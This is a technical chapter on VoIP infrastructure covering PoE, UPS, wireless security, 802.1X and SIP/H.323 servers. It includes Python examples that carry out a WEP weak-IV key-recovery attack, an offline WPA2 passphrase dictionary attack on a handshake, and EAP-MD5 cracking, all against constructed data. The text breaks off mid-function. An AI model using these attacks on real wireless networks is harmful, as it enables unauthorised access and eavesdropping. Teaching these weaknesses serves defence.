Monday

Power-Supply Infrastructure | VoIP Telephony and Infrastructure


Often overlooked in the infrastructure required for secure VoIP is how power is handled. Analog PSTN phones are powered from the central office and PBX station sets from the PBX itself, both of which sit behind large battery plants, so a conventional phone system stays up through a power outage with no effort on anyone's part. A VoIP phone, the switch that powers it, and the servers and gateways behind them each need their own power source, and all of them must stay up for a single call to work, so the design has to meet the equivalent availability requirement deliberately.

Power-over-Ethernet (IEEE 802.3af)

As the name implies, Power over Ethernet (PoE) eliminates the need to run a separate power supply to common networking appliances. A PoE switch or a midspan power injector puts DC voltage onto the Cat5 cable alongside the data signal. PoE can be used directly with devices designed for it, or with other DC-powered devices by installing a converter at the far end, called a splitter (older literature also says picker or tap), which pulls the power off the cable and delivers it to a regular DC power jack.
The major advantage of PoE is the flexibility it allows in placing equipment. Access points can go where coverage is needed rather than where there happens to be an outlet, and it is usually easier to route a single Cat5 cable outdoors (to an antenna mast or a tree, for instance) than to run mains power there. PoE is also very popular for low-power devices such as IP telephones and webcams, and even some thin-client computers.
PoE is defined by the IEEE 802.3af standard. A compliant power sourcing equipment (PSE) supplies nominally 48 V DC (44 to 57 V at the PSE) over two of the four pairs, with current limited to 350 mA; that works out to 15.4 W at the PSE, of which 12.95 W is guaranteed to arrive at the powered device (PD) after cable loss. Several vendors shipped proprietary (prestandard) implementations; in most cases newer equipment from those vendors is standards-compliant, although at least one vendor lets the client negotiate more or less current through a proprietary exchange beyond what the standard specifies. Higher power was later standardized as IEEE 802.3at (PoE+), which allows 25.5 W at the PD; a phone that needs more than 12.95 W will not come up on an 802.3af-only port.
To address VoIP phone availability with PoE, make sure the PoE switch or injector, the rest of the network path, and the voice servers and gateways can all run on battery for the required length of time, and provision a generator where the requirement exceeds what batteries can reasonably cover. Note also that a PoE switch has a power budget that is usually smaller than 15.4 W times its port count; check that the phones on a given switch fit within it, or the phone plugged in last may simply not power up.
PoE in action is fairly simple. Before applying power, the PSE probes the port at low voltage for a detection signature (a 25 kΩ resistance presented by a compliant PD); a port with no valid signature never receives 48 V, which is what keeps a legacy device or a PC's NIC safe on a PoE port. The PSE may then classify the PD by measuring a small current, which tells it how much power to reserve for the port. Power is delivered in one of two modes. In mode A, the PSE puts one polarity on the pair at pins 1 and 2 and the return on pins 3 and 6 (the data pairs); in mode B it uses the spare pairs, pins 4 and 5 and pins 7 and 8. Only one mode is used on a port at a time, and the PSE chooses which; to be 802.3af compliant, a PD must accept power in either mode.
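The detection and classification handshake described above, followed by the budget check the previous paragraph asks for, as an added example in Python. This is not code from the page; the class table and signature range are from 802.3af, while the port inventory, switch figures and UPS capacity are assumptions constructed for the demo.

```python
# Added example (not from the page): a model of the 802.3af detection/classification
# handshake, plus the per-switch power-budget, UPS-runtime and heat check.
# The port inventory, switch figures and UPS capacity are assumptions for the demo.

# Classification current bands (mA, measured at 15.5-20.5 V) and the PSE power each
# class reserves. A current between bands is treated as Class 0 (the full 15.4 W).
CLASS_CURRENT_MA = {1: (9, 12), 2: (17, 20), 3: (26, 30), 4: (36, 44)}
CLASS_PSE_WATTS = {0: 15.4, 1: 4.0, 2: 7.0, 3: 15.4, 4: 15.4}
MODE_PAIRS = {"A": "pins 1/2 and 3/6 (data pairs)", "B": "pins 4/5 and 7/8 (spare pairs)"}


def detect(signature_ohms):
    """Detection: the PSE probes at 2.7-10.1 V and accepts a 19-26.5 kOhm signature
    (a compliant PD presents 25 kOhm). No signature, no 48 V: a legacy phone or a
    PC NIC on the same port is never powered."""
    return 19_000 <= signature_ohms <= 26_500


def classify(class_current_ma):
    """Classification: the PSE reads the PD's current and maps it to a class."""
    for cls, (lo, hi) in CLASS_CURRENT_MA.items():
        if lo <= class_current_ma <= hi:
            return cls
    return 0


def power_up(port, pse_mode="A"):
    """One port's handshake. The PSE picks the mode; a compliant PD accepts either."""
    if not detect(port["signature_ohms"]):
        return None
    cls = classify(port["class_current_ma"])
    return {"class": cls, "pse_watts": CLASS_PSE_WATTS[cls],
            "mode": pse_mode, "pairs": MODE_PAIRS[pse_mode]}


def budget_check(ports, poe_budget_w, switch_base_w, ups_wh, inverter_eff=0.9):
    """Sum what the PSE reserves per port, flag oversubscription, and estimate the
    UPS runtime and the heat load (1 W = 3.412 BTU/h) for the room budget."""
    powered = [r for r in (power_up(p) for p in ports) if r]
    poe_w = sum(r["pse_watts"] for r in powered)
    total_w = switch_base_w + poe_w
    return {
        "powered_ports": len(powered),
        "poe_watts": round(poe_w, 2),
        "oversubscribed": poe_w > poe_budget_w,
        "ups_runtime_min": round(60 * ups_wh * inverter_eff / total_w, 1),
        "btu_per_hour": round(total_w * 3.412, 1),
    }


def demo():
    # Constructed inventory for one 24-port 802.3af switch: 20 Class 2 phones,
    # 2 Class 3 access points, one PC NIC (no signature) and one legacy device.
    ports = ([{"signature_ohms": 25_000, "class_current_ma": 18}] * 20
             + [{"signature_ohms": 25_000, "class_current_ma": 28}] * 2
             + [{"signature_ohms": 1_000_000, "class_current_ma": 0},
                {"signature_ohms": 500, "class_current_ma": 0}])
    return budget_check(ports, poe_budget_w=370, switch_base_w=60, ups_wh=500)


if __name__ == "__main__":
    print(demo())
```

The reservation is by class, not by what the phone actually draws: a Class 0 phone (no classification) costs the switch the full 15.4 W, which is why a closet full of unclassified phones oversubscribes a switch long before the meter says it should.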

UPS

No availability strategy is complete without appropriate use of Uninterruptible Power Supply (UPS) equipment. Mission-critical equipment such as PBX systems and servers needs protection from unscheduled outages and other electrical faults. A UPS addresses several availability threats:
  • Power surges: when line voltage is higher than it should be, the UPS conditions the supply so that no more than the rated voltage reaches the load. Without one, a surge can permanently damage a power supply or logic board.
  • Partial loss of power: a brownout occurs when line voltage sags below what the equipment requires. A brownout is often more damaging than a clean outage, because equipment may reset unpredictably, corrupt data in flight, or draw excess current trying to compensate.
  • Complete loss of power: a blackout is a total loss of power to an area, common during severe weather that topples the electrical infrastructure. A battery (or flywheel) UPS carries the load for a set period after the lights go out, long enough to ride through a short outage, start a generator, or shut equipment down cleanly before its integrity is compromised. Gas- or diesel-powered units are generators, not UPSs; they take seconds to come on line, and that gap is exactly what the UPS bridges.
Online (double-conversion) units condition power continuously, while cheaper standby units only switch to battery after a brief gap that most equipment tolerates. Whichever you choose, check the runtime against the actual load rather than the nameplate rating, test the failover periodically, and connect the UPS's monitoring interface (serial, USB or SNMP) to the servers so that a long outage triggers an orderly shutdown instead of a crash when the batteries run out.
In a call-center environment, downtime on the phone system can be fatal to the business. With a properly implemented disaster recovery plan that includes a network of UPS devices, the phones can keep working when the rest of the computer systems cannot. That can be the difference between survival and failure for some companies.

Energy and Heat Budget Considerations

Given the heat and energy crisis in many data centers, caused by the rapid increase in equipment density without a corresponding increase in energy efficiency, planning for VoIP availability must include the heat and power capacity of the room where VoIP servers and gateways will be housed. Every watt a device draws ends up as heat (about 3.41 BTU/hr per watt) that the cooling plant must remove, and a PoE switch's budget counts toward both. Don't omit this step only to discover after deployment that you have no power or cooling headroom for the additional equipment!


Wireless Infrastructure | VoIP Telephony and Infrastructure


Wireless access points and the associated infrastructure are similarly considered an extension of the data network. The growing use of VoIP clients on that infrastructure, however, creates several unique security considerations, particularly denial of service, since wireless is a shared medium that any nearby transmitter can saturate or jam. In addition, wireless VoIP handsets have lagged behind laptops in supporting the current wireless encryption recommendations, so the phone you buy may constrain the security you can deploy. All of this should be taken into account in the design and operation of wireless VoIP.

Wireless Encryption: WEP

When wireless networking was first designed, its primary focus was ease of implementation, not security, and as any security expert will tell you, it is extremely difficult to secure a system after the fact. WEP, the Wired Equivalent Privacy scheme, was targeted at preventing theft of service and eavesdropping. WEP comes in two major varieties, 64-bit and 128-bit; longer proprietary variants (152- and 256-bit) exist but are not widely supported. The bit counts include the initialization vector (IV): 64-bit WEP prepends a 24-bit IV to a 40-bit secret key and the two together form the RC4 key, while 128-bit WEP uses a 104-bit key with the same 24-bit IV. 128-bit WEP was implemented by vendors once a U.S. government export restriction on cryptography was lifted. Note that the IV is sent in the clear with every frame, and that a 24-bit IV space means a busy network necessarily starts reusing IVs, and therefore RC4 keystreams, within hours.
In August 2001, Fluhrer, Mantin, and Shamir published a paper on weaknesses in RC4's key scheduling as WEP uses it. Because the IV forms the first three bytes of the RC4 key and is transmitted in the clear, certain IV values (the so-called weak IVs) cause the first keystream byte to leak information about the next secret key byte with a probability of roughly 5 percent, and the first plaintext byte of almost every frame is known in advance (the 0xAA that starts the LLC/SNAP header). An attacker who passively collected enough frames with weak IVs could recover the secret key byte by byte through statistical voting. Access point vendors responded with firmware that skipped the weak IVs.
However, in 2004 an author using the name KoreK released a family of new statistical attacks on WEP, which led to a whole new series of tools (aircrack among them). These attacks no longer depend on the FMS weak IVs: any captured frame with a unique IV contributes a vote. On a 64-bit WEP network an attacker needs only around 100,000 unique IVs (more improves the odds), and 500,000 to 700,000 for 128-bit WEP. On a quiet home network it can take days or weeks to see that much traffic, but attackers found a way to stimulate it: capture an encrypted ARP request (recognizable by its fixed size) and replay it at the access point, which answers every copy with a freshly encrypted frame under a new IV. With this injection attack, a 128-bit WEP network can be broken in as little as 10 minutes. Later work (the PTW attack of Tews, Weinmann and Pyshkin, 2007) cut the requirement to a few tens of thousands of frames, so WEP should be regarded as no encryption at all.
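The weak-IV attack of the two paragraphs above, carried out end to end against a constructed capture, as an added example in Python (not code from the page or from any of the tools it names). The 40-bit key, the frame payload and the capture are constructed; the capture contains one frame under each FMS weak IV of the form (B+3, 255, X), which is the worst case for WEP and the best case for the attacker. Real captures need far more frames because only a fraction of IVs are weak, but the voting is the same.

```python
# Added example (not from the page): the FMS weak-IV key-recovery attack on WEP,
# run against a constructed capture. The secret key is an assumption for the demo.
import struct
import zlib
from collections import Counter

SECRET_KEY = bytes([0x1F, 0x33, 0xA5, 0x7B, 0x09])   # assumed 40-bit WEP key
SNAP_FIRST_BYTE = 0xAA   # first plaintext byte of every LLC/SNAP-encapsulated frame


def rc4_ksa(key):
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key, n):
    s, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, secret, payload):
    """WEP frame body: IV (in clear) || RC4(IV || secret) XOR (payload || CRC-32 ICV)."""
    plain = payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    ks = rc4_keystream(iv + secret, len(plain))
    return iv + bytes(p ^ k for p, k in zip(plain, ks))


def wep_icv_ok(secret, frame):
    """Decrypt with a candidate key and check the ICV: how a cracker confirms a key."""
    iv, body = frame[:3], frame[3:]
    plain = bytes(c ^ k for c, k in zip(body, rc4_keystream(iv + secret, len(body))))
    return struct.pack("<I", zlib.crc32(plain[:-4]) & 0xFFFFFFFF) == plain[-4:]


def capture_weak_iv_frames(secret):
    """Constructed capture: one SNAP frame under each FMS weak IV (B+3, 255, X)."""
    payload = bytes([SNAP_FIRST_BYTE, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"demo"
    return [wep_encrypt(bytes([b + 3, 255, x]), secret, payload)
            for b in range(len(secret)) for x in range(256)]


def fms_votes(frames, known, b):
    """Votes for secret byte b (RC4 key byte b+3) given the recovered prefix `known`."""
    votes = Counter()
    for frame in frames:
        key = frame[:3] + known           # K[0..b+2] are known: the IV plus recovered bytes
        s, j = list(range(256)), 0
        for i in range(b + 3):            # replay the KSA up to step b+3
            j = (j + s[i] + key[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        if s[1] >= b + 3 or s[1] + s[s[1]] != b + 3:
            continue                      # state not "resolved": this IV tells us nothing
        out = frame[3] ^ SNAP_FIRST_BYTE  # first keystream byte, courtesy of the SNAP header
        # With ~5% probability the state survives the remaining KSA steps, and then the
        # first output is S[j'] of step b+3, which gives K[b+3] = S^-1[out] - j - S[b+3].
        votes[(s.index(out) - j - s[b + 3]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len, width=4):
    """Byte-by-byte recovery keeping the top `width` candidates per byte; the
    CRC-32 ICV of one captured frame picks the real key out of the candidates."""
    prefixes = [b""]
    for b in range(key_len):
        relevant = [f for f in frames if f[0] == b + 3]
        prefixes = [p + bytes([byte]) for p in prefixes
                    for byte, _ in fms_votes(relevant, p, b).most_common(width)]
    return next((k for k in prefixes if wep_icv_ok(k, frames[0])), None)


def demo(secret=SECRET_KEY):
    return recover_key(capture_weak_iv_frames(secret), len(secret))


if __name__ == "__main__":
    print("recovered:", demo().hex(), "expected:", SECRET_KEY.hex())
```

Nothing here needs the attacker to transmit: the votes come from the clear-text IV, the first ciphertext byte, and the fact that the first plaintext byte is always 0xAA. The ICV check at the end is the same trick the real tools use to confirm a candidate key without any further traffic.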

Wireless Encryption: WPA2

WPA, WiFi Protected Access, was created to address the inadequacy of WEP while still running on WEP-era hardware. WPA keeps RC4 but wraps it in the Temporal Key Integrity Protocol (TKIP): a 128-bit temporal key and a 48-bit packet sequence counter (in place of WEP's 24-bit IV) are mixed, per packet, into a fresh RC4 key, so the weak-IV correlations behind the WEP attacks no longer apply and the counter cannot wrap in practice. The temporal keys themselves are derived at association and rekeyed periodically rather than configured statically. A Message Integrity Code (MIC, the Michael algorithm) covers the source and destination addresses and the payload, and the sequence counter doubles as a replay counter: a frame received out of sequence is dropped, which defeats the packet replay that cripples WEP.
WPA2 is the Wi-Fi Alliance's certified form of the IEEE 802.11i standard. RC4 is replaced by AES, which is still considered secure, used in CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol): counter mode provides confidentiality and CBC-MAC provides the integrity check, so CCMP replaces both the TKIP encryption and the Michael MIC. A frame whose MIC does not verify is discarded.
Ease of deployment was actually WPA's selling point: TKIP was designed so that vendors needed only to reflash the firmware of WEP-era access points and cards. WPA2's AES-CCMP usually needs hardware support, so older equipment had to be replaced, which is one reason TKIP lingered and why some wireless VoIP handsets offered only WEP or WPA long after WPA2 was available.
Although considerably stronger than its older brother WEP, WPA2 is not without weaknesses. In Personal (pre-shared key) mode the pairwise master key is derived from the passphrase and the SSID by a deterministic hash (PBKDF2-SHA1 with 4096 iterations), and the four-way handshake that follows is authenticated with keys derived from it, so anyone who captures one handshake can test passphrase guesses offline at leisure. Joshua Wright released a tool called coWPAtty that does exactly that: it takes a list of dictionary words, derives the keys from each, and compares the resulting handshake MIC against the captured one; when the right passphrase is found, the traffic is open. Enterprise mode (802.1X) is not affected, because each user receives a fresh master key from the authentication exchange rather than sharing a passphrase.
Although brute-force cracking is not guaranteed to yield results, it leverages a weakness found in almost all security mechanisms: the user. If a user chooses a passphrase that is not strong enough, or uses semipredictable modifications (the number 3 in place of "e"), the network will fall, because those substitutions are in every cracking wordlist. Use a passphrase rather than a traditional password. WPA allows 8 to 63 characters; a random passphrase of 20 or more characters, including nonalphanumerics, is far beyond dictionary and brute-force reach, whereas the eight-character minimum is not. And never, ever, use a dictionary word, which will often be recovered within minutes using freely available software from the Internet. Note also that the SSID is the salt in the key derivation: a common default SSID lets an attacker reuse precomputed tables.
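The key derivation and the offline dictionary attack of the two preceding paragraphs, as an added example in Python. This is not coWPAtty's code nor anything from the page; it implements the 802.11i derivation (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the handshake MIC) over a constructed handshake whose SSID, addresses, nonces, EAPOL frame and passphrase are all assumptions. The PMK derivation is checked against the 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
# Added example (not from the page): WPA/WPA2-Personal key derivation and the offline
# dictionary attack against a captured four-way handshake. Everything below the
# imports is constructed for the demo.
import hashlib
import hmac

SSID = b"corp-voice"                         # assumed network name (it is the PBKDF2 salt)
AP_MAC = bytes.fromhex("001122334455")       # authenticator address (constructed)
STA_MAC = bytes.fromhex("66778899aabb")      # supplicant address (constructed)
ANONCE = bytes(range(32))                    # nonces are random in real life; fixed here
SNONCE = bytes(range(32, 64))

# EAPOL-Key message 2 (supplicant -> AP) with its 16-byte MIC field zeroed, which is
# exactly the byte string the MIC is computed over: version, type, length, descriptor
# type, key info, key length, replay counter, nonce, IV, RSC, ID, MIC, key-data length.
EAPOL_MSG2_MIC_ZEROED = (bytes.fromhex("0203005f" "02" "010a" "0000" "0000000000000001")
                         + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    return b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from the PMK plus the handshake's addresses and nonces; KCK is bytes 0-15."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def handshake_mic(passphrase):
    """What the station computes, and what an attacker recomputes per guess."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2_MIC_ZEROED)


def dictionary_attack(captured_mic, wordlist):
    """Offline: no packets sent, no lockout; the cost is one PBKDF2 (4096 HMACs) per guess."""
    for word in wordlist:
        if handshake_mic(word) == captured_mic:
            return word
    return None


# Constructed capture: the MIC the real station put on message 2 under this passphrase.
TRUE_PASSPHRASE = "summ3r2006"               # assumed; "3 for e" is in every wordlist
CAPTURED_MIC = handshake_mic(TRUE_PASSPHRASE)
WORDLIST = ["password", "summer", "summer2006", "summ3r2006", "voip1234"]

if __name__ == "__main__":
    print("recovered passphrase:", dictionary_attack(CAPTURED_MIC, WORDLIST))
```

The 4096 PBKDF2 iterations are the only thing slowing the attacker down, and they are the same for every network with the same SSID, which is why a default SSID is a liability and a long random passphrase is the actual defense.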
When implementing wireless VoIP, always use WPA2 or protect the VoIP stream by other means (for example, media and signaling encryption, or an IPsec tunnel). Given the speed with which WEP can be cracked, it is almost pointless to use it: it adds encryption latency and creates a false sense of security.

Authentication: 802.1x

802.1X is an authentication (and to a lesser extent, authorization) framework, whereas WEP, WPA and WPA2 are encryption protocols. Although 802.1X works on wired networks as well, it is most common today on wireless networks, where it is the basis of WPA/WPA2-Enterprise. It adds a layer beyond the shared secret associated with the encryption key: a user or device must authenticate individually before it is allowed on the network, and in Enterprise mode the encryption keys themselves are derived from that authentication rather than from a passphrase everyone knows.
802.1X works by forcing users (or devices) to identify themselves before any of their traffic is allowed onto the network. It does this with the Extensible Authentication Protocol (EAP) framework, which carries the chosen authentication method (passwords, challenge-response, certificates, tokens) between the client and the authentication server. 802.1X carries EAP directly inside Ethernet frames (EAPOL) rather than over PPP, the dial-up link protocol for which EAP was originally defined. There are many EAP methods, and they differ enormously in security: methods that build a TLS tunnel and validate the server's certificate (EAP-TLS, PEAP, EAP-TTLS) protect the credential, while EAP-MD5 exposes a challenge-response pair that can be cracked offline and produces no keying material, so it cannot be used for wireless encryption at all. When comparing vendor support for 802.1X in infrastructure and VoIP phones, pay careful attention to the specific methods supported and to whether the phone can validate the server's certificate; phones are often the weakest link.
As soon as the access point, called the authenticator, detects that the link is active, it sends an EAP Request/Identity to the party requesting access, known as the supplicant. The supplicant replies with an EAP Response/Identity, which the authenticator relays (typically inside RADIUS) to the authentication server. The server then drives the chosen EAP method through the authenticator, which only relays EAP packets, opens the port if the server finally answers EAP Success, and keeps it blocked on EAP Failure (see Figure 1). In WPA/WPA2-Enterprise the server also hands the authenticator the master key produced by the method, which seeds the four-way handshake.
 
Figure 1: A Basic 802.1x Implementation for a Wireless Network
Think of the supplicant as the guy trying to get into "Club WLAN" who asks the guy at the door (the authenticator) whether he is on the list. The authenticator flags down the bouncer (the authentication server) to check. If he is on the list, the bouncer lets him in to party with the rest of the party-packets; if not, it's to the curb he goes!
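The exchange in Figure 1 at the message level, as an added example in Python (not code from the page). Supplicant, authenticator and authentication server are modelled as functions exchanging real RFC 3748 EAP packets in 802.1X EAPOL framing; EAP-MD5 is used as the method because it fits in a few lines, and the last function shows why it is the wrong method for wireless. The identities, password and challenge are constructed.

```python
# Added example (not from the page): the 802.1X/EAP exchange of Figure 1 as a
# message-level simulation with EAP-MD5 as the method, plus the eavesdropper's view
# that shows why EAP-MD5 is unfit for wireless. Credentials are constructed.
import hashlib
import os
import struct

REQUEST, RESPONSE, SUCCESS, FAILURE = 1, 2, 3, 4        # RFC 3748 codes
TYPE_IDENTITY, TYPE_MD5_CHALLENGE = 1, 4                # RFC 3748 types


def eap_pack(code, ident, type_=None, data=b""):
    """EAP packet: Code(1) Identifier(1) Length(2) [Type(1) Type-Data]."""
    body = b"" if type_ is None else bytes([type_]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def eap_unpack(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt):
        raise ValueError("EAP length field does not match packet")
    return code, ident, (pkt[4] if length > 4 else None), pkt[5:]


def eapol(eap_pkt):
    """802.1X framing on the LAN: Version(1)=2 Type(1)=0 (EAP-Packet) Length(2) Body."""
    return struct.pack("!BBH", 2, 0, len(eap_pkt)) + eap_pkt


class Supplicant:
    def __init__(self, identity, password):
        self.identity, self.password = identity, password

    def handle(self, eap_pkt):
        code, ident, type_, data = eap_unpack(eap_pkt)
        if code == REQUEST and type_ == TYPE_IDENTITY:
            return eap_pack(RESPONSE, ident, TYPE_IDENTITY, self.identity.encode())
        if code == REQUEST and type_ == TYPE_MD5_CHALLENGE:
            challenge = data[1:1 + data[0]]                       # Value-Size, Value, Name
            digest = hashlib.md5(bytes([ident]) + self.password + challenge).digest()
            return eap_pack(RESPONSE, ident, TYPE_MD5_CHALLENGE,
                            bytes([16]) + digest + self.identity.encode())
        return eap_pack(RESPONSE, ident, 3)                       # Nak: method not supported


class AuthServer:
    """The RADIUS side: owns the credentials and the accept/reject decision."""
    def __init__(self, users, challenge=None):
        self.users, self.challenge, self.peer = users, challenge or os.urandom(16), None

    def handle(self, eap_pkt):
        code, ident, type_, data = eap_unpack(eap_pkt)
        if code == RESPONSE and type_ == TYPE_IDENTITY:
            self.peer = data.decode()
            return eap_pack(REQUEST, ident + 1, TYPE_MD5_CHALLENGE,
                            bytes([16]) + self.challenge + b"voice-radius")
        if code == RESPONSE and type_ == TYPE_MD5_CHALLENGE and self.peer in self.users:
            expected = hashlib.md5(bytes([ident]) + self.users[self.peer] + self.challenge).digest()
            if data[1:1 + data[0]] == expected:
                return eap_pack(SUCCESS, ident)
        return eap_pack(FAILURE, ident)


def run_8021x(supplicant, server, transcript):
    """The authenticator (access point): starts with Request/Identity, then only relays
    EAP between the two parties, and opens the port only on EAP Success."""
    pkt = eap_pack(REQUEST, 1, TYPE_IDENTITY)
    while True:
        transcript.append(("authenticator->supplicant", eapol(pkt)))
        if eap_unpack(pkt)[0] in (SUCCESS, FAILURE):
            return eap_unpack(pkt)[0] == SUCCESS
        reply = supplicant.handle(pkt)
        transcript.append(("supplicant->authenticator", eapol(reply)))
        pkt = server.handle(reply)                               # carried in RADIUS in real life


def crack_md5_challenge(transcript, wordlist):
    """An eavesdropper's view: EAP-MD5 is CHAP, so one captured challenge/response pair
    is an offline dictionary target, and the method yields no key for WPA to use."""
    challenge = response = ident = None
    for _, frame in transcript:
        code, pid, type_, data = eap_unpack(frame[4:])          # strip the EAPOL header
        if type_ == TYPE_MD5_CHALLENGE and code == REQUEST:
            challenge = data[1:1 + data[0]]
        elif type_ == TYPE_MD5_CHALLENGE:
            ident, response = pid, data[1:1 + data[0]]
    return next((w for w in wordlist
                 if hashlib.md5(bytes([ident]) + w + challenge).digest() == response), None)


def demo():
    users = {"phone-2201": b"Winter06!"}                         # assumed credential store
    transcript = []
    ok = run_8021x(Supplicant("phone-2201", b"Winter06!"),
                   AuthServer(users, challenge=bytes(range(16))), transcript)
    rejected = run_8021x(Supplicant("phone-2201", b"wrong"), AuthServer(users), [])
    cracked = crack_md5_challenge(transcript, [b"password", b"Winter06!", b"admin"])
    return ok, rejected, len(transcript), cracked


if __name__ == "__main__":
    print(demo())
```

The authenticator never sees the password and makes no decision of its own; that is the whole point of the design, and it is also why the method matters so much: with a tunnelled method the transcript above would contain a TLS handshake and nothing an eavesdropper could replay or crack.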
Because of its moderate complexity, 802.1X has been slow to catch on with home users: the need for an authentication server (such as a RADIUS server) and a server certificate puts it out of reach for most. For businesses and public hotspots that want more security than WEP or WPA2-Personal alone provide, however, 802.1X is the right tool.



Media Servers

The term media server is totally overloaded in the VoIP world (and even more so within the IT industry as a whole). Even restricting ourselves to VoIP-related definitions, a server so named could still be any of the following:
  • Interactive voice response (IVR) server or media slave, possibly running VoiceXML or MRCP
  • Signaling Media Server (Media Gateway Controller) to handle call control in Voice/VoIP network
  • Call distribution (ACD) for receiving and distributing calls in a contact center
  • Conferencing Media Server for voice, video, and other applications
  • Text-to-speech server (TTS) for listening to e-mail, for instance
  • Automated voice-to-e-mail response system
  • Voice or video applications server
  • Streaming content server
  • Fax-on-demand server
Sure, some of these are similar and can roughly be grouped together, but at best you will get them down to semi-overlapping groups centered on two general areas: interactive media services, and call or resource control. The point is that the VoIP world has not standardized architectures or naming conventions yet, so we are left with technically vague terms like media server, media gateway and, the worst offender, softswitch. Softswitch is a marketing term: it was intended to conjure up the image of a class 5 switch being displaced by a software blob that runs these media servers and media gateways, but it has become so overloaded that it has lost any technical meaning it may once have had, and we will not spend more time on it.

Interactive Media Service: Media Servers

On the other hand, there is a kind of media server that actually contains DSP resources it uses to process speech or video (and perhaps other forms of media). These servers may generate and detect DTMF tones, execute the logic of an IVR system, convert text to speech, or deliver streaming or document content in response to speech or DTMF input. Or they may orchestrate multiway calls and conferences, transcode between codecs, or process fax. Media servers of this class may provide VoiceXML interpretation for interactive, dynamic voice applications.

Call or Resource Control: Media Servers

This class of media server manages communications resources at a higher level, for example handling call control while directing media gateways that hold the DSP and other resources that actually manipulate media. Media servers of this class support VoIP protocols and usually others as well, such as digital voice or video trunks or even analog voice, through media gateways. Examples include call control servers from PBX vendors that control separate gateways, voice processing servers that manage and redirect DSP resources located elsewhere, and call distribution systems that manage off-board call handling resources such as switches and IVR systems.
The H.323 Gatekeeper
The gatekeeper manages the terminals and gateways in an H.323 zone. It provides address translation (alias or E.164 number to IP address) and admission control: endpoints register with it and must ask its permission (a RAS admission request) before each call, which lets the gatekeeper cap the number of simultaneous calls or the bandwidth in use on a link rather than relying on a proxy for that. Because the gatekeeper is the central authority for the zone, an administrator can roll out dial plan changes quickly and authoritatively across a voice network. A call works something like this: a user wants to reach someone at another office. His terminal (or the gateway serving his analog phone) sends the local gatekeeper an admission request carrying the called party's alias; the gatekeeper resolves it, querying the gatekeeper at the other office if the alias is not local, and returns the address to which call setup should be sent, so the call proceeds to the destination gateway and on to the called party's desk. Note that RAS registration and admission are unauthenticated unless H.235 is in use, so the gatekeeper should be reachable only from the voice network. Many call control media servers include an H.323 gatekeeper.
Registration Servers
In a traditional PSTN or PBX switching system, where each user is at a fixed location, usually tied in place by copper wires, routing calls is (relatively speaking) simple. So-called find-me/follow-me services on PSTN or PBX switches can add PSTN mobility. Forwarding or extension-to-cellular features can increase this sense of mobility, but all these solutions require active user programming or rely on fixed forwarding algorithms and are rooted in the PSTN.
But with VoIP, a user can be located virtually anywhere on the planet (as long as minimum QoS conditions are met). A registration server (in SIP, the registrar) acts as the point of contact for mobile users. Johnny can register from his hotel room in Amsterdam with an IP address nobody knew in advance, and the registrar records that binding so the proxies know where to route his calls; Johnny keeps the same phone number no matter where he physically is. Instant messaging networks work the same way: a user logs in with his screen name from home and is reachable to the same people as if he had logged in from work. In the H.323 world registration is a function of the gatekeeper; in SIP the registrar is a logically separate function, often co-located with the proxy. Because a registration changes where a number rings, REGISTER requests must be authenticated (SIP uses HTTP Digest), or anyone who can reach the registrar can rebind Johnny's number to a phone of their own choosing.
Redirect Servers
A SIP redirect server acts as the traffic light at the VoIP intersection. Much like a web page with a redirect built in, a redirect server answers a request with a 3xx response (for example, 302 Moved Temporarily) whose Contact header gives the destination's current address, rather than forwarding the request itself. Armed with that address, the client re-sends the INVITE to the new destination. This takes load off proxy servers and improves call routing robustness, since the redirect server keeps no call state: a call is quickly diverted rather than requiring the proxy to complete the connection itself.
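The registration and redirect exchanges of the two preceding paragraphs, as an added example in Python (not code from the page). It models a registrar that authenticates REGISTER with HTTP Digest (RFC 3261 section 22) and checks that the authenticated user owns the address-of-record being bound, a redirect server that answers INVITE with 302 from the registrar's bindings, and a user agent that answers the challenge and follows the redirect. The realm, users, passwords, addresses and clock are constructed.

```python
# Added example (not from the page): a SIP registrar with Digest-authenticated REGISTER,
# a redirect server, and a user agent following the 302. Realm, users, addresses and
# the clock are constructed for the demo.
import hashlib
import re
import secrets

REALM = "example.com"


def parse_sip(msg):
    """Start line plus headers (names lower-cased); bodies are not needed here."""
    lines = msg.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = dict((n.strip().lower(), v.strip()) for n, _, v in
                   (line.partition(":") for line in lines[1:]))
    return lines[0], headers


def digest_response(user, password, method, uri, nonce):
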